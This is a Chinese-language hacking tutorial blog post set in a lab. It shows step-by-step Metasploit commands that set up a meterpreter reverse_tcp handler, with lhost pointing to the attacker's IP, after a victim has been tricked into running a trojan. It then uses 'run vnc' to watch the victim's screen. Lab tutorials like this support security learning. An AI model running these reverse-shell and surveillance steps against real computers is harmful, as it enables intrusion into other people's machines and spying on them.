网络安全工程师演示：原来黑客是这样控制你的计算机的！（下）

课前声明：
1、本分享仅做学习交流，请自觉遵守法律法规！
2、搜索：Kali 与编程，学习更多网络攻防干货！
3、Kali 与编程每天准时更新，敬请学习和关注！
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用木马控制受害者主机呢？接下来让我们一起学习！
二、资源装备
1.安装好且已经被安装木马的Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 利用Metasploit（msf）渗透框架对目标受害者主机进行木马控制，如下图所示。
步骤1:开启Metasploit（msf）渗透测试框架，如下图所示。
命令：msfconsole

步骤2：使用对应的漏洞利用模块，如下图所示。（当然你也可以利用search命令检索对应的漏洞进行利用）
命令：use exploit/multi/handler

步骤3：设置payload连接方式，如下图所示。
命令：set payload windows/meterpreter/reverse_tcp

步骤4：查看攻击模块需要设置的参数，如下图所示。
命令：show options

步骤5：需要设置的攻击参数如下图所示。
Lhost：攻击者主机IP地址。

步骤6：查看攻击者主机（Kali主机）的IP地址，如下图所示。
命令：ifconfig

步骤7：设置对应的参数，如下图所示。
这里以设置lhost（攻击者主机IP）举例
命令：set lhost IP
例子：set lhost 192.168.78.144

步骤8：查看对应的参数是否设置成功，如下图所示。
命令：show options

步骤9：运行攻击模块，如下图所示。
命令：run

3.2 利用社会工程学相关手段诱导受害者主机使用者启动其主机已经下载的木马文件（这里做实验就直接进入受害者主机双击打开），如下图所示。

3.3 如下图所示，在Kali攻击者主机生成了对应的session会话。

3.4 利用木马控制受害者主机，如下图所示。
步骤1：运行vnc程序监控目标主机，如下图所示。
命令：run vnc

步骤2：如下图所示，运行命令后对应的监控画面显示到kali主机中，可以监控受害者主机的一举一动。


小编一个个字敲打创作，可辛苦了，问君可否关注一下我呢？你还可搜索:Kali与编程，学习更多黑客渗透技巧呢 ！拒绝盗版，转载请声明来源：Kali与编程
点我学习更多Kali Linux渗透测试与网络攻防实战技巧！